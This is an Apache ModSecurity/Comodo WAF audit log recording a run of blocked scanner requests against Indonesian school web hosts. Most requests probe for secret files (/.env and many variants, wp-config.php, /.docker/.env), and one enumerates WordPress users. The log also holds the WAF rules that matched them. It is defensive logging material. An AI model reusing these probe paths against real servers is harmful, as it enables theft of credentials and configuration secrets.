[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748981311364021 855 (- - -) Stopwatch2: 1748981311364021 855; combined=365, p1=330, p2=0, p3=0, p4=0, p5=34, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec7fe132-Z-- --1a4ddb7f-A-- [04/Jun/2025:04:15:42 +0700] aD9l_pLmnxTwEPX7IubNBAAAAJY 103.236.140.4 40874 103.236.140.4 8181 --1a4ddb7f-B-- GET /.docker/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36 Accept-Charset: utf-8 --1a4ddb7f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a4ddb7f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748985342990242 935 (- - -) Stopwatch2: 1748985342990242 935; combined=373, p1=333, p2=0, p3=0, p4=0, p5=40, sr=119, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a4ddb7f-Z-- --ece84f1c-A-- [04/Jun/2025:04:22:39 +0700] aD9nnzNXNn6zAsHj7JAWPgAAAFc 103.236.140.4 40920 103.236.140.4 8181 --ece84f1c-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.133.172.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.133.172.220 X-Forwarded-Proto: https Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) --ece84f1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ece84f1c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748985759180660 2579 (- - -) Stopwatch2: 1748985759180660 2579; combined=1148, p1=381, p2=740, p3=0, p4=0, p5=27, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ece84f1c-Z-- --8c3af575-A-- [04/Jun/2025:04:30:04 +0700] aD9pXNhPZJx8OfNaLCovbwAAAMo 103.236.140.4 41022 103.236.140.4 8181 --8c3af575-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 64.225.123.97 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 64.225.123.97 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --8c3af575-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c3af575-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748986204725296 1004 (- - -) Stopwatch2: 1748986204725296 1004; combined=362, p1=320, p2=0, p3=0, p4=0, p5=41, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c3af575-Z-- --ac703357-A-- [04/Jun/2025:04:33:14 +0700] aD9qGthPZJx8OfNaLCovcQAAAM0 103.236.140.4 41058 103.236.140.4 8181 --ac703357-B-- GET /.env.save HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) CriOS/30.0.1599.12 Mobile/11A465 Safari/8536.25 (3B92C18B-D9DE-4CB7-A02A-22FD2AF17C8F) Accept-Charset: utf-8 --ac703357-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac703357-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748986394007945 992 (- - -) Stopwatch2: 1748986394007945 992; combined=376, p1=335, p2=0, p3=0, p4=0, p5=41, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac703357-Z-- --bb558d69-A-- [04/Jun/2025:05:01:23 +0700] aD9ws5LmnxTwEPX7IubNPAAAAJc 103.236.140.4 41196 103.236.140.4 8181 --bb558d69-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.84.199 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.84.199 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36 Accept-Charset: utf-8 --bb558d69-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb558d69-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748988083703995 877 (- - -) Stopwatch2: 1748988083703995 877; combined=357, p1=315, p2=0, p3=0, p4=0, p5=42, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb558d69-Z-- --3bf28776-A-- [04/Jun/2025:05:35:04 +0700] aD94mNhPZJx8OfNaLCovvwAAAMk 103.236.140.4 42162 103.236.140.4 8181 --3bf28776-B-- GET /wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172602419 --3bf28776-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3bf28776-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748990104622872 864 (- - -) Stopwatch2: 1748990104622872 864; combined=345, p1=302, p2=0, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3bf28776-Z-- --18d98625-A-- [04/Jun/2025:06:12:04 +0700] aD-BRJLmnxTwEPX7IubOvAAAAJA 103.236.140.4 43852 103.236.140.4 8181 --18d98625-B-- GET /._wp-config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603397 --18d98625-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --18d98625-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992324769297 619 (- - -) Stopwatch2: 1748992324769297 619; combined=294, p1=261, p2=0, p3=0, p4=0, p5=32, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18d98625-Z-- --8f80562a-A-- [04/Jun/2025:06:13:25 +0700] aD-BlTNXNn6zAsHj7JAXJQAAAE4 103.236.140.4 43910 103.236.140.4 8181 --8f80562a-B-- GET /.env-dev.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603421 --8f80562a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8f80562a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992405016098 915 (- - -) Stopwatch2: 1748992405016098 915; combined=375, p1=336, p2=0, p3=0, p4=0, p5=39, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f80562a-Z-- --a8f0dc53-A-- [04/Jun/2025:06:13:26 +0700] aD-BlthPZJx8OfNaLCowlAAAAMo 103.236.140.4 43914 103.236.140.4 8181 --a8f0dc53-B-- GET /.env-prod.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521298 --a8f0dc53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a8f0dc53-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992406273653 831 (- - -) Stopwatch2: 1748992406273653 831; combined=322, p1=289, p2=0, p3=0, p4=0, p5=33, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f0dc53-Z-- --321d8e7b-A-- [04/Jun/2025:06:13:33 +0700] aD-BnV_DvM40jZomokt-FgAAAAs 103.236.140.4 43918 103.236.140.4 8181 --321d8e7b-B-- GET /.env.*.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603424 --321d8e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --321d8e7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992413379222 865 (- - -) Stopwatch2: 1748992413379222 865; combined=321, p1=279, p2=0, p3=0, p4=0, p5=42, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --321d8e7b-Z-- --be2e5b49-A-- [04/Jun/2025:06:13:37 +0700] aD-BoV_DvM40jZomokt-FwAAAAw 103.236.140.4 43922 103.236.140.4 8181 --be2e5b49-B-- GET /.env.back.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603427 --be2e5b49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --be2e5b49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992417499099 688 (- - -) Stopwatch2: 1748992417499099 688; combined=292, p1=261, p2=0, p3=0, p4=0, p5=31, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be2e5b49-Z-- --48a45a0d-A-- [04/Jun/2025:06:13:38 +0700] aD-BopLmnxTwEPX7IubOvQAAAJM 103.236.140.4 43926 103.236.140.4 8181 --48a45a0d-B-- GET /.env.backup.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521301 --48a45a0d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --48a45a0d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992418121301 901 (- - -) Stopwatch2: 1748992418121301 901; combined=407, p1=368, p2=0, p3=0, p4=0, p5=39, sr=168, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48a45a0d-Z-- --d8be0e52-A-- [04/Jun/2025:06:13:38 +0700] aD-BothPZJx8OfNaLCowlQAAAMw 103.236.140.4 43930 103.236.140.4 8181 --d8be0e52-B-- GET /.env.bak.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603430 --d8be0e52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d8be0e52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992418849436 775 (- - -) Stopwatch2: 1748992418849436 775; combined=352, p1=316, p2=0, p3=0, p4=0, p5=36, sr=146, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8be0e52-Z-- --e35eab39-A-- [04/Jun/2025:06:13:40 +0700] aD-BpDNXNn6zAsHj7JAXJwAAAFM 103.236.140.4 43934 103.236.140.4 8181 --e35eab39-B-- GET /.env.conf.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603433 --e35eab39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e35eab39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992420177202 681 (- - -) Stopwatch2: 1748992420177202 681; combined=324, p1=287, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e35eab39-Z-- --f9148110-A-- [04/Jun/2025:06:13:42 +0700] aD-BpjNXNn6zAsHj7JAXKAAAAFE 103.236.140.4 43940 103.236.140.4 8181 --f9148110-B-- GET /.env.config.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521307 --f9148110-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f9148110-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992422804365 696 (- - -) Stopwatch2: 1748992422804365 696; combined=244, p1=204, p2=0, p3=0, p4=0, p5=40, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f9148110-Z-- --1a13656e-A-- [04/Jun/2025:06:13:48 +0700] aD-BrJLmnxTwEPX7IubOvwAAAJc 103.236.140.4 43948 103.236.140.4 8181 --1a13656e-B-- GET /.env.defaults.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521310 --1a13656e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --1a13656e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992428992851 961 (- - -) Stopwatch2: 1748992428992851 961; combined=418, p1=384, p2=0, p3=0, p4=0, p5=34, sr=169, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a13656e-Z-- --219e1239-A-- [04/Jun/2025:06:13:53 +0700] aD-BsV_DvM40jZomokt-GAAAAA4 103.236.140.4 43952 103.236.140.4 8181 --219e1239-B-- GET /.env.dev.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 162521313 --219e1239-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --219e1239-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992433561562 681 (- - -) Stopwatch2: 1748992433561562 681; combined=265, p1=228, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --219e1239-Z-- --8ad11e36-A-- [04/Jun/2025:06:13:55 +0700] aD-Bs5LmnxTwEPX7IubOwAAAAIA 103.236.140.4 43956 103.236.140.4 8181 --8ad11e36-B-- GET /.env.development.php HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 139.162.28.194 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 139.162.28.194 Accept-Encoding: gzip X-Varnish: 172603439 --8ad11e36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8ad11e36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748992435080185 847 (- - -) Stopwatch2: 1748992435080185 847; combined=328, p1=285, p2=0, p3=0, p4=0, p5=43, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
